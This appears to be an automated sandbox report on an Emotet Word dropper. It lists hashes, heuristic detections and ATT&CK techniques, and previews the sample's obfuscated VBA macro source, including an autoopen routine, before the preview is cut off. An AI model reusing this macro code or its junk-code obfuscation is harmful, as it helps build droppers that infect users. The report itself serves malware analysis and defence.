Emotet Office (OLE) malware analysis — malicious · 0aba359f77ac5765

MALICIOUS

Office (OLE)

154.9 KB Created: 2019-05-02 16:38:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 1d063cf8e4b83cacab1e6054373ff57f SHA-1: b178ae07ad5b2e86a2d28c7543e136a984a60980 SHA-256: 0aba359f77ac576510a26b160b60e4b0bc470db5ec0341e64234681ec8c607c1

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is identified as malicious by ClamAV with a specific Emotet signature. High-severity heuristics indicate the presence of VBA macros, including an AutoOpen macro and a WMI process creation call, which are commonly used to download and execute further stages. The VBA script itself is heavily obfuscated but the heuristics strongly suggest its purpose is to launch a malicious process.

Heuristics 7

ClamAV: Doc.Dropper.Emotet-6960272-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Emotet-6960272-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 31128 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	31128 bytes
SHA-256: `d61688ae7d9f68cd290202d39cd75a445d98483555b4034f4a9b1162983ff968`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "P304821" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "B854667" Attribute VB_Base = "0{D9D79538-D81B-4838-B66B-653BC7CD7CFF}{89548644-A208-4FD0-98D5-441771F0696E}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Z03201" Attribute VB_Name = "C37266_" Attribute VB_Name = "c955609" Attribute VB_Base = "0{9E297354-B15D-484D-BE1D-CB6B3473D2DD}{B47FB3B5-30B4-44BD-AC5F-44FF99E1B652}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "l4722754" Function F497_66(z64_72) Select Case n5554069 Case i465376 = b66820 = Sgn(471333696) Case s7261945 = p89161 Case a504467_ = Log(n36069) Case J239105 = CBool(451270235) Case n6_881 = 957082140 Case i3801617 = CDate(v3_2193) End Select Select Case Y3_0594 Case Y6613_ = E47130 = Sgn(182332894) Case c71647 = R47376_ Case n46623 = Log(S7943494) Case n472_7 = CBool(455423588) Case O9698_32 = 838331306 Case X536__2 = CDate(w9_432) End Select Select Case Q6495_83 Case U32_903 = z8674829 = Sgn(468039462) Case i2662841 = p443443 Case s91043 = Log(w1433080) Case j9172563 = CBool(377410670) Case C5_836_ = 496974668 Case K495__ = CDate(X742764) End Select Set F497_66 = CVar(z64_72) Select Case b52_114 Case d62_87 = k___192 = Sgn(709969944) Case D_9917 = m52179 Case k0302_1 = Log(s5867_3) Case P95956 = CBool(855892121) Case C5742481 = 236360998 Case z2_23326 = CDate(V07769) End Select Select Case V216_3 Case p1113571 = z_8__7 = Sgn(122239280) Case C9947_1 = q754866 Case Z965280 = Log(W63641) Case J185126 = CBool(897905841) Case n74256_7 = 117942140 Case f159_85 = CDate(M48245) End Select Select Case U7_449 Case b925_199 = a575393_ = Sgn(483630630) Case U72964 = o71205 Case H8129321 = Log(z43254_7) Case w86876 = CBool(291986409) Case L810_13 = 458547345 Case G61904_ = CDate(L933330) End Select End Function Sub autoopen() Select Case h_09641 Case p7_418 = R5123_ = Sgn(377277628) Case s46998 = K92527 Case S766_3 = Log(R42056_6) Case Z8251__ = CBool(30290621) Case S8395005 = 889515263 Case f29566 = CDate(l0719212) End Select Select Case C1040_9 Case s26389 = A6_9_271 = Sgn(964608343) Case S6_21414 = m6352781 Case P25767 = Log(u43_39) Case t_508681 = CBool(267674597) Case T9601268 = 242473150 Case j66_5_7 = CDate(V36987) End Select Select Case u_368338 Case h298942 = o133250 = Sgn(56115851) Case I_501102 = A688875 Case Y846787 = Log(D2925008) Case j8_345 = CBool(626239198) Case b661584 = 108196528 Case n355119 = CDate(D90_4208) End Select Call X01_884 Select Case i747408_ Case O4470_71 = z36309_ = Sgn(778089229) Case z_142047 = q00083_ Case o05739 = Log(F97___) Case S3_517_9 = CBool(596131204) Case R77705 = 712650870 Case d4078830 = CDate(s0424__) End Select Select Case L385843 Case P231831 = i05537 = Sgn(839811757) Case n_62440 = b023649 Case j8206679 = Log(p_179_) Case B3002277 = CBool(49099996) Case W177933 = 187188136 Case z669098 = CDate(O31496) End Select End Sub Attribute VB_Name = "r71782" Function X01_884() On Error Resume Next Select Case C36046 Case L925428 = r32461 = Sgn(73907688) Case z3453775 = I_01619 Case K171433 = Log(p73684) Case N97700_ = CBool(264746464) Case z28386 = 653461758 Case V312_147 = CDate(j46619) End Select Select Case R9529912 Case B_8503 = q9378825 = Sgn(210491738) Case Q359_577 = u8_73094 Case T_6727 = Log(l_4753) Case f29_3760 = CBool(911317383) Case w50413 = 639562234 Case k084860 = CDate(Q480438) ... (truncated)

SHA-256: d61688ae7d9f68cd290202d39cd75a445d98483555b4034f4a9b1162983ff968

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "P304821"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "B854667"
Attribute VB_Base = "0{D9D79538-D81B-4838-B66B-653BC7CD7CFF}{89548644-A208-4FD0-98D5-441771F0696E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Z03201"

Attribute VB_Name = "C37266_"

Attribute VB_Name = "c955609"
Attribute VB_Base = "0{9E297354-B15D-484D-BE1D-CB6B3473D2DD}{B47FB3B5-30B4-44BD-AC5F-44FF99E1B652}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "l4722754"
Function F497_66(z64_72)
   Select Case n5554069
Case i465376 = b66820 = Sgn(471333696)
Case s7261945 = p89161
Case a504467_ = Log(n36069)
Case J239105 = CBool(451270235)
Case n6_881 = 957082140
Case i3801617 = CDate(v3_2193)
End Select
   Select Case Y3_0594
Case Y6613_ = E47130 = Sgn(182332894)
Case c71647 = R47376_
Case n46623 = Log(S7943494)
Case n472_7 = CBool(455423588)
Case O9698_32 = 838331306
Case X536__2 = CDate(w9_432)
End Select
   Select Case Q6495_83
Case U32_903 = z8674829 = Sgn(468039462)
Case i2662841 = p443443
Case s91043 = Log(w1433080)
Case j9172563 = CBool(377410670)
Case C5_836_ = 496974668
Case K495__ = CDate(X742764)
End Select
Set F497_66 = CVar(z64_72)
   Select Case b52_114
Case d62_87 = k___192 = Sgn(709969944)
Case D_9917 = m52179
Case k0302_1 = Log(s5867_3)
Case P95956 = CBool(855892121)
Case C5742481 = 236360998
Case z2_23326 = CDate(V07769)
End Select
   Select Case V216_3
Case p1113571 = z_8__7 = Sgn(122239280)
Case C9947_1 = q754866
Case Z965280 = Log(W63641)
Case J185126 = CBool(897905841)
Case n74256_7 = 117942140
Case f159_85 = CDate(M48245)
End Select
   Select Case U7_449
Case b925_199 = a575393_ = Sgn(483630630)
Case U72964 = o71205
Case H8129321 = Log(z43254_7)
Case w86876 = CBool(291986409)
Case L810_13 = 458547345
Case G61904_ = CDate(L933330)
End Select
End Function
Sub autoopen()
   Select Case h_09641
Case p7_418 = R5123_ = Sgn(377277628)
Case s46998 = K92527
Case S766_3 = Log(R42056_6)
Case Z8251__ = CBool(30290621)
Case S8395005 = 889515263
Case f29566 = CDate(l0719212)
End Select
   Select Case C1040_9
Case s26389 = A6_9_271 = Sgn(964608343)
Case S6_21414 = m6352781
Case P25767 = Log(u43_39)
Case t_508681 = CBool(267674597)
Case T9601268 = 242473150
Case j66_5_7 = CDate(V36987)
End Select
   Select Case u_368338
Case h298942 = o133250 = Sgn(56115851)
Case I_501102 = A688875
Case Y846787 = Log(D2925008)
Case j8_345 = CBool(626239198)
Case b661584 = 108196528
Case n355119 = CDate(D90_4208)
End Select
Call X01_884
   Select Case i747408_
Case O4470_71 = z36309_ = Sgn(778089229)
Case z_142047 = q00083_
Case o05739 = Log(F97___)
Case S3_517_9 = CBool(596131204)
Case R77705 = 712650870
Case d4078830 = CDate(s0424__)
End Select
   Select Case L385843
Case P231831 = i05537 = Sgn(839811757)
Case n_62440 = b023649
Case j8206679 = Log(p_179_)
Case B3002277 = CBool(49099996)
Case W177933 = 187188136
Case z669098 = CDate(O31496)
End Select
End Sub

Attribute VB_Name = "r71782"
Function X01_884()
On Error Resume Next
   Select Case C36046
Case L925428 = r32461 = Sgn(73907688)
Case z3453775 = I_01619
Case K171433 = Log(p73684)
Case N97700_ = CBool(264746464)
Case z28386 = 653461758
Case V312_147 = CDate(j46619)
End Select
   Select Case R9529912
Case B_8503 = q9378825 = Sgn(210491738)
Case Q359_577 = u8_73094
Case T_6727 = Log(l_4753)
Case f29_3760 = CBool(911317383)
Case w50413 = 639562234
Case k084860 = CDate(Q480438)

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.